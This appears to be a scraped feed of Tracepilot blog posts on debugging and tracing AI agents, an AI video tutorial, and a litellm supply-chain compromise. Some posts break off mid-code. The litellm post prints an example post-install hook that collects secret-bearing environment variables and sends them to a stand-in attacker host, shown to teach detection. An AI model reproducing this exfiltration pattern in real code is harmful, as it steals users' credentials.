e.errors() returns a list of errors, each with a loc path to the failing field. But if the LLM returned a completely wrong structure (like nesting entities under a different key), all you get is a generic "field required" error.

Option 2: Validate before parsing

def validate_llm_response(raw: dict) -> ExtractedEntitiesFreeform | None:
    """Pre-validate and normalize common LLM quirks"""

    # Handle field name drift
    if "relations" in raw and "relationships" not in raw:
        raw["relationships"] = raw.pop("relations")

    # Handle nested structure issues
    if "entities" in raw:
        for entity in raw["entities"]:
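            # Normalize confidence scores that arrive as strings
            confidence = entity.get("confidence")
            if isinstance(confidence, str):
                cleaned = confidence.strip()
                try:
                    value = float(cleaned.rstrip("%"))
                    # "85%" becomes 0.85; a plain "0.85" stays 0.85
                    entity["confidence"] = value / 100 if cleaned.endswith("%") else value
                except ValueError:
                    entity["confidence"] = 0.5  # Default for labels like "high"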

    try:
        return ExtractedEntitiesFreeform(**raw)
    except ValidationError as e:
        logger.error(f"LLM response structure: {json.dumps(raw, indent=2)}")
        logger.error(f"Validation errors: {e.errors()}")
        return None

This works. But you're writing defensive code for every schema change. Every new field is another normalization rule. It's brittle and it doesn't scale.

The Real Problem

You're debugging blind. You have:

The input text (chunk 22)
The LLM response (truncated error message)
The failed validation (no field context)

What you don't have is the exact LLM output that failed. You can't see what Claude actually returned. You can't replay the extraction with a fixed prompt. You're guessing.

Enter TracePilot

One line change:

import json

from pydantic import ValidationError
from tracepilot import TracePilot

tp = TracePilot(api_key="tp_live_YOUR_KEY")

async def extract_entities(text: str):
    await tp.start_trace("entity-extraction")

    response = await tp.wrap_llm_call(
        llm_fn=lambda: client.messages.create(
            model="claude-sonnet-4-20250514",
            max_tokens=1024,
            messages=[{
                "role": "user",
                "content": f"Extract entities from:\n\n{text}"
            }]
        ),
        metadata={"chunk_id": "chunk-22", "doc_id": "doc-123"}
    )

    raw = json.loads(response.content[0].text)

    try:
        entities = ExtractedEntitiesFreeform(**raw)
        await tp.log_success(entities.dict())
        return entities
    except ValidationError as e:
        # TracePilot captures the full LLM output
        await tp.log_failure({
            "error": str(e),
            "raw_response": raw,  # Now you can see it
            "validation_errors": e.errors()
        })
        return None

Now when chunk 22 fails, you open your TracePilot dashboard. You see:

The exact JSON Claude returned
Which field failed validation
The full error trace

Click Fork & Rerun. Edit the prompt to add "use 'relationships' not 'relations'". Replay. The fix takes 30 seconds. No redeployment.

The Hook

You've got 47 more chunks to process. Each one could fail with a different LLM quirk. You could write defensive code for every edge case. Or you could add one import and see exactly what the LLM returned when it broke.

Sound familiar?

Get your free API key — the first 10k traces are on us. Your debugging time is worth more than that.


AI CLI Tools Are Eating Each Other's Lunch

Tracepilot — Mon, 06 Jul 2026 16:43:29 +0000

Here's what's happening in 2026.

Every AI company ships a CLI tool. Claude Code. OpenAI Codex. Gemini CLI. GitHub Copilot CLI. Kimi Code. OpenCode. Pi. Qwen Code.

They all do the same thing. Read your repo. Write code. Run commands. Make mistakes.

The problem isn't which one to pick. It's that they're all opaque black boxes that fail in exactly the same ways.

The Failure Pattern Never Changes

You ask an AI CLI to fix a bug. It reads 47 files. Spends $1.20 in tokens. Writes a "fix" that breaks your build.

You have no idea why.

Was it the prompt? Did it misinterpret a file? Did it hallucinate an API that doesn't exist? Did it get stuck in a loop rewriting the same function?

Traditional debugging is archaeology. You dig through terminal output. You guess. You try again with a slightly different prompt. Maybe it works. Maybe it doesn't.

Sound familiar?

What Actually Happens Under The Hood

Let's look at a real failure. Claude Code was asked to refactor a React component. Here's what the trace showed:

Step 1: Read src/components/UserProfile.tsx (success)
Step 2: Read src/hooks/useUser.ts (success)  
Step 3: Read src/types/user.d.ts (success)
Step 4: Generate new component (success, 847 tokens)
Step 5: Write to src/components/UserProfile.tsx (success)
Step 6: Run tests (FAILURE - 3 failing tests)

The tool reported "task completed with test failures." Useless.

With proper tracing, you see the actual state at each step:

{
  "step": 4,
  "input_tokens": 1247,
  "output_tokens": 847,
  "prompt_preview": "Refactor UserProfile to use the new useUser hook pattern...",
  "output_preview": "export function UserProfile({ userId }: { userId: string }) { ... }",
  "tool_calls": [
    { "name": "read_file", "args": { "path": "src/types/user.d.ts" }, "result": "..." },
    { "name": "write_file", "args": { "path": "src/components/UserProfile.tsx" }, "result": "success" }
  ],
  "latency_ms": 3402,
  "cost_usd": 0.047
}

Now you can see the problem. The model read user.d.ts but didn't read the actual API contract in api/users.ts. It invented a field that doesn't exist.
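A quick way to catch this class of failure is to compare the files a step actually read against the files you expected it to consult. The sketch below assumes a trace step shaped like the JSON above; the `unread_files` helper and the `expected` set are illustrative names, not part of any SDK.

```python
def unread_files(step: dict, expected: set[str]) -> set[str]:
    """Return the expected files that no read_file call in this step touched."""
    read = {
        call["args"]["path"]
        for call in step.get("tool_calls", [])
        if call.get("name") == "read_file"
    }
    return expected - read


step = {
    "step": 4,
    "tool_calls": [
        {"name": "read_file", "args": {"path": "src/types/user.d.ts"}, "result": "..."},
        {"name": "write_file", "args": {"path": "src/components/UserProfile.tsx"}, "result": "success"},
    ],
}

missing = unread_files(step, {"src/types/user.d.ts", "api/users.ts"})
print(sorted(missing))  # ['api/users.ts']
```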

The Manual Fix That Works

You don't need a fancy tool for this. You need to instrument your AI CLI calls.

Here's the bare minimum approach:

# Wrap the CLI call with timing and output capture.
# The braces plus 2>&1 send the `time` report into the log along with the output.
{ time claude-code "refactor UserProfile" ; } 2>&1 | tee "claude_run_$(date +%s).log"

# Parse the log for failures
grep -i "error\|fail\|exception" claude_run_*.log

But that's garbage. You get the same flat log everyone else has.
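If you stay with the wrap-the-process approach, one step up from a flat log is a structured record per run. This is a minimal sketch, assuming the CLI can be invoked non-interactively as a subprocess. The `run_and_record` helper and its record fields are hypothetical, and the demo runs the Python interpreter as a stand-in rather than a real AI CLI.

```python
import json
import subprocess
import sys
import time


def run_and_record(cmd: list[str]) -> dict:
    """Run a command and return one structured record for the run."""
    start = time.monotonic()
    proc = subprocess.run(cmd, capture_output=True, text=True)
    return {
        "cmd": cmd,
        "exit_code": proc.returncode,
        "duration_s": round(time.monotonic() - start, 3),
        "stdout": proc.stdout,
        "stderr": proc.stderr,
    }


# Stand-in command so the sketch runs anywhere; swap in your CLI invocation.
record = run_and_record([sys.executable, "-c", "print('refactor done')"])
print(json.dumps(record, indent=2))
```

You can now filter on `exit_code` or `duration_s` instead of grepping, but you still only see the process boundary, not the individual steps inside it.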

The One-Line Change That Changes Everything

Instead of wrapping the output, wrap the calls.

import { TracePilot } from 'tracepilot-sdk';

const tp = new TracePilot(process.env.TRACEPILOT_API_KEY);

// Before:
const result = await claudeCode.refactor('UserProfile', files);

// After:
const { result, spanId } = await tp.wrapToolCall(
  'refactor-component',
  () => claudeCode.refactor('UserProfile', files),
  parentSpanId,
  4
);

That's it. One line changed. Now every tool call is tracked.

When the build breaks, you open the dashboard. You see the exact state at step 4 — the prompt, the files read, the output, the tokens, the latency. You click "Fork & Rerun". You edit the prompt to say "also read api/users.ts". You hit replay.

No redeployment. No "works on my machine". No guessing.

Why This Actually Matters

AI CLI tools are becoming the default way developers interact with codebases. They're not toys anymore. They're writing production code, running deployments, modifying databases.

The cost of failure is real.

Failure	Without TracePilot	With TracePilot
Hallucinated API	Debug 45 min	Fork, fix prompt, 30 sec
Wrong refactor	Revert, retry, 2 hrs	See exact state, fix one line
Token explosion	Find in billing, too late	See it happening live

The Pattern Is Always The Same

Every AI CLI tool follows the same pattern:

1. Read context (files, git history, docs)
2. Generate plan
3. Execute tool calls (write files, run commands)
4. Verify result

The failures happen at step 2 or 3. And without tracing, you're blind.

TracePilot gives you eyes. One import. One wrapper. Done.
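What a per-step wrapper records can be sketched in a few lines. This is not the TracePilot SDK. It is a generic illustration in Python, and the `span` context manager, the `spans` list, and the phase names are all assumptions made for the example.

```python
import time
from contextlib import contextmanager

spans: list[dict] = []


@contextmanager
def span(step: int, name: str):
    """Record duration and outcome of one phase, even when it raises."""
    record = {"step": step, "name": name, "status": "ok"}
    start = time.monotonic()
    try:
        yield record
    except Exception as exc:
        record["status"] = "error"
        record["error"] = str(exc)
        raise
    finally:
        record["duration_ms"] = round((time.monotonic() - start) * 1000, 1)
        spans.append(record)


def run_pipeline() -> None:
    with span(1, "read_context") as s:
        s["files"] = ["src/types/user.d.ts"]
    with span(2, "generate_plan"):
        pass
    with span(3, "execute_tool_calls"):
        raise RuntimeError("build failed")  # simulated failure


try:
    run_pipeline()
except RuntimeError:
    pass

for s in spans:
    print(s["step"], s["name"], s["status"])
```

The failing phase still gets a record, with the error message attached, which is the part a flat log tends to lose.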

Next time your AI CLI tool ships garbage, you'll know exactly why. And you'll fix it in seconds, not hours.

Get your free API key. Fork a failing run. See what your agent actually did.


Build an AI Video Platform with BoTTube: A Developer's Tutorial

Tracepilot — Sat, 04 Jul 2026 03:53:41 +0000

Build an AI Video Platform with BoTTube: A Developer's Tutorial

What we're building: A fully functional AI-powered video platform that generates, processes, and serves content — all running on your local machine with BoTTube's open-source stack.

Prerequisites

Node.js 18+ installed
Python 3.9+ installed
FFmpeg (for video processing)
An OpenAI API key (for AI generation)
15 minutes of your time

Step 1: Clone and Set Up BoTTube

BoTTube is an AI video platform that's already processed 1000+ videos. Let's get it running locally.

# Clone the repository
git clone https://github.com/ElyanLabs/bottube.git
cd bottube

# Install dependencies
npm install
pip install -r requirements.txt

# Copy environment config
cp .env.example .env

Open .env and add your API keys:

OPENAI_API_KEY=sk-your-key-here
VIDEO_STORAGE_PATH=./videos
PORT=3000

Step 2: Start the Video Processing Pipeline

BoTTube's pipeline handles everything from script generation to final export. Let's start the core services:

# Terminal 1: Start the API server
npm run dev

# Terminal 2: Start the video processor
python -m bottube.processor --workers 4

You should see:

[BoTTube] API server running on http://localhost:3000
[BoTTube] Video processor initialized with 4 workers

Step 3: Generate Your First AI Video

Now let's create a video programmatically. Create a file called generate.js:

// generate.js
import { BoTTubeClient } from 'bottube-sdk';

const client = new BoTTubeClient({
  apiKey: process.env.OPENAI_API_KEY,
  endpoint: 'http://localhost:3000'
});

async function createVideo() {
  // Define your video content
  const video = await client.create({
    script: "Explain quantum computing in 60 seconds",
    style: "educational",
    duration: 60, // seconds
    voice: "en-US-neural",
    background: "gradient-blue"
  });

  console.log(`Video created: ${video.id}`);
  console.log(`Status: ${video.status}`);

  // Poll until complete, re-reading the status on every pass
  let status = video;
  while (status.status !== 'complete') {
    await new Promise(r => setTimeout(r, 2000));
    status = await client.getStatus(video.id);
    console.log(`Processing: ${status.progress}%`);
  }

  console.log(`✅ Video ready at: ${video.url}`);
}

createVideo().catch(console.error);

Run it:

node generate.js

You'll see progress updates. In about 30 seconds, your first AI-generated video is ready.
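The polling loop above has no upper bound, so a stuck job would keep it spinning forever. A bounded variant can be sketched as follows, in Python for brevity. `get_status` is a stand-in for whatever status call your client exposes, and the timeout and interval defaults are arbitrary assumptions.

```python
import time
from typing import Callable


def wait_until_complete(
    get_status: Callable[[], dict],
    timeout_s: float = 120.0,
    interval_s: float = 2.0,
) -> dict:
    """Poll get_status() until it reports 'complete' or the deadline passes."""
    deadline = time.monotonic() + timeout_s
    while True:
        status = get_status()
        if status.get("status") == "complete":
            return status
        if time.monotonic() >= deadline:
            raise TimeoutError(f"still {status.get('status')!r} after {timeout_s}s")
        time.sleep(interval_s)


# Fake status source that completes on the third poll.
responses = iter([
    {"status": "processing", "progress": 30},
    {"status": "processing", "progress": 80},
    {"status": "complete", "progress": 100},
])
final = wait_until_complete(lambda: next(responses), timeout_s=5, interval_s=0.01)
print(final["progress"])  # 100
```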

Step 4: Build a Video Feed API

Let's create an API endpoint that serves your generated videos:

# api/feed.py
from fastapi import FastAPI, HTTPException, Query
from bottube import VideoManager
from typing import Optional

app = FastAPI()
manager = VideoManager(storage_path="./videos")

@app.get("/api/feed")
async def get_feed(
    limit: int = Query(10, ge=1, le=50),
    category: Optional[str] = None,
    sort: str = "newest"
):
    """Get a paginated feed of AI-generated videos"""

    videos = manager.list_videos(
        limit=limit,
        category=category,
        sort_by=sort
    )

    return {
        "videos": videos,
        "total": len(videos),
        "page": 1
    }

@app.get("/api/video/{video_id}")
async def get_video(video_id: str):
    """Get detailed info about a specific video"""

    video = manager.get_video(video_id)
    if not video:
        # A (body, status) tuple is a Flask idiom; FastAPI sets the status via an exception
        raise HTTPException(status_code=404, detail="Video not found")

    return {
        "id": video.id,
        "title": video.title,
        "duration": video.duration,
        "url": video.url,
        "created_at": video.created_at,
        "metadata": video.metadata
    }

Step 5: Add the Frontend

Here's a minimal React component to display your video feed:

// components/VideoFeed.tsx
import { useState, useEffect } from 'react';

interface Video {
  id: string;
  title: string;
  duration: number;
  url: string;
  thumbnail: string;
}

export function VideoFeed() {
  const [videos, setVideos] = useState<Video[]>([]);
  const [loading, setLoading] = useState(true);

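  useEffect(() => {
    fetch('/api/feed?limit=20')
      .then(res => {
        if (!res.ok) throw new Error(`Feed request failed: ${res.status}`);
        return res.json();
      })
      .then(data => setVideos(data.videos))
      .catch(err => console.error(err))
      .finally(() => setLoading(false)); // stop the loading state on success or failure
  }, []);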

  if (loading) return <div>Loading videos...</div>;

  return (
    <div className="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-3 gap-4">
      {videos.map(video => (
        <div key={video.id} className="bg-white rounded-lg shadow-md overflow-hidden">
          <video 
            src={video.url} 
            controls 
            className="w-full h-48 object-cover"
          />
          <div className="p-4">
            <h3 className="font-semibold text-lg">{video.title}</h3>
            <p className="text-gray-500 text-sm">
              {Math.floor(video.duration / 60)}:{(video.duration % 60).toString().padStart(2, '0')}
            </p>
          </div>
        </div>
      ))}
    </div>
  );
}

Step 6: Deploy and Scale

BoTTube handles scaling automatically. For production:

# Build for production
npm run build

# Start with PM2 for process management
pm2 start ecosystem.config.js

# Or deploy with Docker
docker-compose up -d

Your platform is now live. You can generate, process, and serve AI videos at scale.

What You've Built

In under 15 minutes, you've created:

✅ An AI video generation pipeline
✅ A REST API for video management
✅ A responsive frontend feed
✅ A production-ready deployment setup

BoTTube handles the heavy lifting — script generation, voice synthesis, video composition, and encoding — so you can focus on building the platform experience.

Next Steps

Add user authentication with NextAuth.js
Implement video categories and search
Add analytics to track views and engagement
Create playlists and user collections
Integrate with S3 for cloud storage

The full source code and documentation are available at github.com/ElyanLabs/bottube. Join the community — we're building the future of AI-generated content, one video at a time.

This tutorial was built with BoTTube v1.2.0. For questions or contributions, check the GitHub repo or join our Discord.


Building an Observability Layer for Your AI Agent: ProteusTracer

Tracepilot — Fri, 03 Jul 2026 17:28:10 +0000

Building an Observability Layer for Your AI Agent: ProteusTracer

What we're building

A production-grade observability layer for the Proteus agent framework that captures every LLM call, tool invocation, and token spend — so you can debug failures in seconds instead of hours.

Prerequisites

Node.js 18+
A Proteus agent project (or any agent framework)
TypeScript 5+
Basic familiarity with OpenTelemetry concepts

Step 1: Define the core interfaces

Start with the types that will power your observability. This is the contract every tracer must satisfy.

// types.ts
export interface Span {
  id: string;
  traceId: string;
  parentSpanId?: string;
  name: string;
  kind: SpanKind;
  status: SpanStatus;
  startTime: number;
  endTime?: number;
  attributes: Record<string, string | number | boolean>;
  events: SpanEvent[];
}

export interface SpanEvent {
  name: string;
  timestamp: number;
  attributes?: Record<string, string | number | boolean>;
}

export enum SpanKind {
  INTERNAL = 'INTERNAL',
  CLIENT = 'CLIENT',
  SERVER = 'SERVER',
  PRODUCER = 'PRODUCER',
  CONSUMER = 'CONSUMER',
}

export enum SpanStatus {
  OK = 'OK',
  ERROR = 'ERROR',
  UNKNOWN = 'UNKNOWN',
}

export interface Metric {
  name: string;
  value: number;
  unit: string;
  timestamp: number;
  labels: Record<string, string>;
}

export interface TraceContext {
  traceId: string;
  spanId: string;
  isSampled: boolean;
}

This gives you the building blocks. Every LLM call becomes a span. Every tool invocation becomes a child span. Every token count becomes a metric.

Step 2: Build the ProteusTracer

Now wire those interfaces into a working tracer that wraps your agent's execution flow.

// proteus-tracer.ts
import { Span, SpanKind, SpanStatus, Metric, TraceContext } from './types';
import { v4 as uuidv4 } from 'uuid';

export class ProteusTracer {
  private spans: Map<string, Span> = new Map();
  private metrics: Metric[] = [];
  private activeTrace?: TraceContext;

  constructor(private readonly serviceName: string) {}

  startTrace(): TraceContext {
    const traceId = uuidv4();
    const rootSpanId = uuidv4();

    const rootSpan: Span = {
      id: rootSpanId,
      traceId,
      name: `${this.serviceName}.run`,
      kind: SpanKind.SERVER,
      status: SpanStatus.UNKNOWN,
      startTime: Date.now(),
      attributes: {
        'proteus.service': this.serviceName,
        'proteus.version': '1.0.0',
      },
      events: [],
    };

    this.spans.set(rootSpanId, rootSpan);
    this.activeTrace = { traceId, spanId: rootSpanId, isSampled: true };

    return this.activeTrace;
  }

  startSpan(name: string, parentSpanId?: string): Span {
    const spanId = uuidv4();
    const traceId = this.activeTrace?.traceId || uuidv4();

    const span: Span = {
      id: spanId,
      traceId,
      parentSpanId: parentSpanId || this.activeTrace?.spanId,
      name,
      kind: SpanKind.INTERNAL,
      status: SpanStatus.UNKNOWN,
      startTime: Date.now(),
      attributes: {},
      events: [],
    };

    this.spans.set(spanId, span);
    return span;
  }

  endSpan(spanId: string, status: SpanStatus = SpanStatus.OK): void {
    const span = this.spans.get(spanId);
    if (span) {
      span.endTime = Date.now();
      span.status = status;
    }
  }

  addSpanEvent(spanId: string, name: string, attributes?: Record<string, string | number | boolean>): void {
    const span = this.spans.get(spanId);
    if (span) {
      span.events.push({ name, timestamp: Date.now(), attributes });
    }
  }

  recordMetric(name: string, value: number, unit: string, labels: Record<string, string> = {}): void {
    this.metrics.push({
      name,
      value,
      unit,
      timestamp: Date.now(),
      labels: { ...labels, service: this.serviceName },
    });
  }

  export(): { spans: Span[]; metrics: Metric[] } {
    return {
      spans: Array.from(this.spans.values()),
      metrics: this.metrics,
    };
  }

  reset(): void {
    this.spans.clear();
    this.metrics = []; // arrays have no clear() method
    this.activeTrace = undefined;
  }
}
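`export()` returns spans as a flat list, which gets hard to read once calls nest. Rebuilding the tree from `parentSpanId` can be sketched as below, in Python for brevity. It assumes the exported spans have been serialized to dicts using the field names from types.ts; `build_tree` and `render` are hypothetical helpers.

```python
from collections import defaultdict


def build_tree(spans: list[dict]) -> dict:
    """Group span ids by parent; roots are stored under the key None."""
    children = defaultdict(list)
    for s in spans:
        children[s.get("parentSpanId")].append(s["id"])
    return dict(children)


def render(spans: list[dict]) -> list[str]:
    """Return indented span names in depth-first order."""
    by_id = {s["id"]: s for s in spans}
    tree = build_tree(spans)
    lines: list[str] = []

    def walk(span_id: str, depth: int) -> None:
        lines.append("  " * depth + by_id[span_id]["name"])
        for child in tree.get(span_id, []):
            walk(child, depth + 1)

    for root in tree.get(None, []):
        walk(root, 0)
    return lines


exported = [
    {"id": "a", "name": "agent.run"},
    {"id": "b", "name": "llm.gpt-4o-mini", "parentSpanId": "a"},
    {"id": "c", "name": "tool.read_file", "parentSpanId": "a"},
]
print("\n".join(render(exported)))
```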

Step 3: Create a bridge handler for your agent

This is where the tracer meets your actual agent execution. The bridge handler wraps your agent's phases and instruments every call.


// bridge-handler.ts
import { ProteusTracer } from './proteus-tracer';
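import { SpanKind, SpanStatus } from './types';

// Shape of the context handed to the agent callback, inferred from its use in runAgent below
export interface AgentContext {
  traceId: string;
  agentName: string;
  instrumentLLMCall: <T>(model: string, messages: unknown[], callFn: () => Promise<T>) => Promise<T>;
  instrumentToolCall: <T>(toolName: string, args: unknown, callFn: () => Promise<T>) => Promise<T>;
}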

export class AgentBridgeHandler {
  private tracer: ProteusTracer;

  constructor(serviceName: string) {
    this.tracer = new ProteusTracer(serviceName);
  }

  async runAgent<T>(agentName: string, fn: (context: AgentContext) => Promise<T>): Promise<T> {
    const trace = this.tracer.startTrace();
    const context: AgentContext = {
      traceId: trace.traceId,
      agentName,
      instrumentLLMCall: (model, messages, callFn) => 
        this.instrumentLLMCall(model, messages, callFn),
      instrumentToolCall: (toolName, args, callFn) =>
        this.instrumentToolCall(toolName, args, callFn),
    };

    try {
      const result = await fn(context);
      this.tracer.endSpan(trace.spanId, SpanStatus.OK);
      return result;
    } catch (error) {
      this.tracer.addSpanEvent(trace.spanId, 'error', { 
        'error.message': (error as Error).message 
      });
      this.tracer.endSpan(trace.spanId, SpanStatus.ERROR);
      throw error;
    } finally {
      this.exportTrace();
    }
  }

  private async instrumentLLMCall<T>(
    model: string,
    messages: unknown[],
    callFn: () => Promise<T>
  ): Promise<T> {
    const span = this.tracer.startSpan(`llm.${model}`);
    this.tracer.addSpanEvent(span.id, 'llm.request', {
      'llm.model': model,
      'llm.messages.count': messages.length,
    });

    const startTime = Date.now();
    try {
      const result = await callFn();
      const duration = Date.now() - startTime;

      this.tracer.recordMetric('llm.duration', duration, 'ms', { model });
      this.tracer.addSpanEvent(span.id, 'llm.response', {
        'llm.duration.ms': duration,
      });
      this.tracer.endSpan(span.id, SpanStatus.OK);
      return result;
    } catch (error) {
      this.tracer.addSpanEvent(span.id, 'llm.error', {
        'error.message': (error as Error).message,
      });
      this.tracer.recordMetric('llm.errors', 1, 'count', { model });
      this.tracer.endSpan(span.id, SpanStatus.ERROR);
      throw error;
    }
  }

  private async instrumentToolCall<T>(
    toolName: string,
    args: unknown,
    callFn: () => Promise<T>
  ): Promise<T> {
    const span = this.tracer.startSpan(`tool.${toolName}`);
    this.tracer.addSpanEvent(span.id, 'tool.invoke', {
      'tool.name': toolName,
    });

    try {
      const result = await callFn();
      this.tracer.endSpan(span.id, SpanStatus.OK);
      return result;
    } catch (error) {
      this.tracer.addSpanEvent(span.id, 'tool.error', {
        'error.message': (error as Error).

---

**Debugging AI agents shouldn't feel like reading The Matrix.** 
Join other engineers who are building reliable autonomous workflows in our community: [TracePilot Discord](https://discord.gg/KzXRAXFM8)

That PyPI Package You Trusted? Yeah, It Was Compromised

Tracepilot — Mon, 29 Jun 2026 23:33:45 +0000

That PyPI Package You Trusted? Yeah, It Was Compromised

Here's the thing about supply chain attacks: they don't care about your fancy auth system or your zero-trust network. They just need one maintainer to have a bad day.

Last week, litellm v1.82.7 and v1.82.8 hit PyPI. If you ran pip install for either of them during the window they were live, you pulled in a compromised package.

Let's break down what happened, why it matters, and how you can check if you're affected.

The Timeline

v1.82.7 published — looks normal, works normal, but contains injected code from a compromised CI/CD pipeline
v1.82.8 published — same issue, different version number
Community detects anomaly — someone notices unexpected outbound connections from their litellm processes
BerriAI investigates — finds the compromise, yanks both versions from PyPI within hours
Current status — v1.82.9+ are clean. The bad packages are gone.

The root cause? The Trivy supply-chain pipeline was compromised. Not a typo in some dependency. Not a developer's laptop getting owned. The actual CI/CD pipeline that builds and publishes the package.

What The Compromised Code Did

I haven't seen the full decompiled payload, but here's what typically happens in these attacks:

# Simplified example of what a compromised post-install hook looks like
# This is NOT the actual payload — just the pattern
import os
import requests

# Harvest environment variables
env_dump = {k: v for k, v in os.environ.items() if 'KEY' in k or 'SECRET' in k or 'TOKEN' in k}

# Exfiltrate to attacker C2
requests.post('https://evil-c2.example.com/exfil', json=env_dump)

Usually it's a setup.py post-install hook that:

Scans for OPENAI_API_KEY, ANTHROPIC_API_KEY, AWS_ACCESS_KEY_ID, etc.
Packs them up
Ships them to an attacker-controlled endpoint

The scary part? Your pip install ran this automatically. No user interaction needed.

How To Check If You're Affected

# Check your current litellm version
pip show litellm | grep Version

# If it shows 1.82.7 or 1.82.8, you pulled the compromised version
# If it shows anything else, you're likely fine

But here's the problem with "likely fine" — you need to check more than just the version number. The compromise could have:

Stolen your API keys: the attacker now has them
Exfiltrated database credentials: if they were in env vars
Left persistence mechanisms: cron jobs, modified startup scripts
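The version check can also be scripted, so it can run in CI or across many virtualenvs. Here's a minimal sketch using only the standard library. The version set comes from this post; `classify` and `installed_version` are hypothetical helper names.

```python
from importlib import metadata
from typing import Optional

COMPROMISED = {"1.82.7", "1.82.8"}  # versions named in this post


def classify(version: Optional[str]) -> str:
    """Map an installed version string (or None) to a verdict."""
    if version is None:
        return "not installed"
    return "COMPROMISED" if version in COMPROMISED else "not a known-bad version"


def installed_version(package: str) -> Optional[str]:
    """Return the installed version of a package, or None if absent."""
    try:
        return metadata.version(package)
    except metadata.PackageNotFoundError:
        return None


print("litellm:", classify(installed_version("litellm")))
```

A clean verdict only describes what's installed right now. If a bad version was ever installed in that environment, the rotation steps still apply.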

The Manual Fix

# Step 1: Remove the compromised package
pip uninstall litellm

# Step 2: Rotate ALL credentials that were in environment variables
# Don't just rotate your OpenAI key. Rotate everything.
# The attacker had access to your full environment.

# Step 3: Check for persistence
crontab -l
ls -la /etc/cron.*
grep -iE "curl|wget|eval|base64" ~/.bashrc

# Step 4: Audit outbound connections
sudo netstat -tunp | grep ESTABLISHED
# Look for connections to unknown IPs

# Step 5: Reinstall clean version
pip install litellm==1.82.9
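For step 2, it helps to list which variables an env-harvesting payload would have matched. The sketch below prints names only, never values, and reuses the KEY/SECRET/TOKEN substrings from the example pattern earlier in this post. `names_to_rotate` is a hypothetical helper, and a real payload may well match more than these three markers.

```python
import os
from typing import Mapping

MARKERS = ("KEY", "SECRET", "TOKEN")  # same substrings as the pattern shown earlier


def names_to_rotate(environ: Mapping[str, str]) -> list[str]:
    """Return sorted names of variables that look like credentials."""
    return sorted(
        name for name in environ
        if any(marker in name.upper() for marker in MARKERS)
    )


sample = {"OPENAI_API_KEY": "sk-...", "AWS_SECRET_ACCESS_KEY": "...", "HOME": "/root"}
print(names_to_rotate(sample))      # ['AWS_SECRET_ACCESS_KEY', 'OPENAI_API_KEY']
print(names_to_rotate(os.environ))  # names only; values are never printed
```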

What This Actually Means

This isn't a litellm-specific problem. This is a "we all rely on open source packages and their CI/CD pipelines are attack surfaces" problem.

The same attack vector works against:

Any PyPI package with automated publishing
Any npm package with CI/CD auto-deploy
Any Docker image built from a compromised base

Sound familiar? It should. This is the same pattern as the event-stream npm incident, the colors and faker sabotage, and about a dozen others I've lost count of.

How To Protect Yourself

Short term:

Pin your dependencies to specific versions
Use pip install --require-hashes with a lockfile
Monitor your environment for unexpected outbound connections

Long term:

Run your own internal PyPI mirror with manual approval for new versions
Use container builds that cache dependencies and diff-check them
Implement runtime monitoring that alerts on unexpected process behavior

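# Example: Generate a requirements file with hashes using pip-tools
# (pip freeze has no hash option; pip-compile reads your top-level deps from requirements.in)
pip install pip-tools
pip-compile --generate-hashes --output-file requirements-hashed.txt requirements.in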

# Install with hash verification
pip install --require-hashes -r requirements-hashed.txt
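What hash pinning buys you is a byte-level check of each artifact before it gets installed. The sketch below shows that comparison in isolation, assuming a locally downloaded file and an expected SHA-256 digest you trust. It illustrates the idea and is not pip's implementation; the throwaway file stands in for a real wheel.

```python
import hashlib
import os
import tempfile


def sha256_of(path: str) -> str:
    """Stream a file through SHA-256 and return the hex digest."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def matches(path: str, expected_hex: str) -> bool:
    """True when the file's digest equals the pinned digest."""
    return sha256_of(path) == expected_hex.lower()


# Demo with a throwaway file standing in for a downloaded wheel.
with tempfile.NamedTemporaryFile(delete=False) as tmp:
    tmp.write(b"pretend this is a wheel")
pinned = hashlib.sha256(b"pretend this is a wheel").hexdigest()

ok_before = matches(tmp.name, pinned)
with open(tmp.name, "ab") as fh:
    fh.write(b" plus injected code")  # simulate tampering
ok_after = matches(tmp.name, pinned)
os.remove(tmp.name)

print(ok_before, ok_after)  # True False
```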

The Part Nobody Talks About

The attacker didn't need to break into BerriAI's GitHub. They didn't need to social-engineer a maintainer. They compromised the CI/CD pipeline — the automated system that builds and ships the package.

That's the scariest part. Because most teams spend their security budget on production infrastructure, not on their build pipelines. And the build pipeline has access to everything.

Guess what happens next?

Someone's going to find another pipeline vulnerability. Maybe it's npm this time. Maybe it's a GitHub Actions runner. Maybe it's your company's internal package registry.

The fix isn't "don't use open source." The fix is "treat your CI/CD pipeline like your production environment — because it's the most valuable target an attacker could hit."

Check your pip freeze output. Rotate those keys. And maybe don't auto-update production dependencies on Fridays.


Building a Real-Time Ticket Refinement Dashboard

Tracepilot — Fri, 26 Jun 2026 18:17:39 +0000

Watchdog: When Your AI Agent Needs a Babysitter

Tracepilot — Mon, 22 Jun 2026 22:09:12 +0000

Watchdog: When Your AI Agent Needs a Babysitter

Here's the problem. Your agent has a self_modify tool. It can change its own config, rewrite its prompts, update its system instructions. Sounds great until it enters a death spiral.

I've seen it happen. Agent decides its temperature is too low. Bumps it to 0.9. Output gets weirder. Agent decides it needs MORE creativity. Bumps to 1.2. Now it's hallucinating database schemas. Agent tries to "fix" itself by rewriting its system prompt. Now it thinks it's a pirate. You get billed $47 before someone notices.

The fix? A watchdog. Not the Kubernetes kind. Something that watches the agent itself.

What Actually Breaks

Three failure modes. You've seen all of them.

Infinite loops. Agent calls a tool. Tool returns data. Agent calls the same tool with the same args. Again. Again. Token count hits 500K. You're paying for nothing.

Unresponsive LLM. API timeout. Rate limit. Network blip. Agent doesn't handle it gracefully — just sits there waiting. No error. No retry. Just silence.

Self-modify degradation. Agent changes its prompt from "helpful assistant" to "maximize engagement." Suddenly it's arguing with users. Or it drops the temperature too low and produces the same response to every question.

The Watchdog Pattern

import asyncio

class AgentWatchdog:
    def __init__(self, agent, config: WatchdogConfig):
        self.agent = agent
        self.config = config
        self.metrics = MetricsCollector()
        self.anomaly_detector = AnomalyDetector()

    async def monitor(self):
        while self.agent.is_running:
            # snapshot: dict of numeric metrics (tokens, latency, cost) for the latest step
            snapshot = await self.collect_snapshot()

            if self.anomaly_detector.is_anomalous(snapshot):
                await self.handle_anomaly(snapshot)
            else:
                # Only healthy snapshots feed the baseline
                self.anomaly_detector.update_baseline(snapshot)

            await asyncio.sleep(self.config.poll_interval)

Three things to watch. Always.

1. Loop Detection

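import time
from collections import deque

class LoopDetector:
    def __init__(self, max_repeats: int = 5, window_seconds: int = 60):
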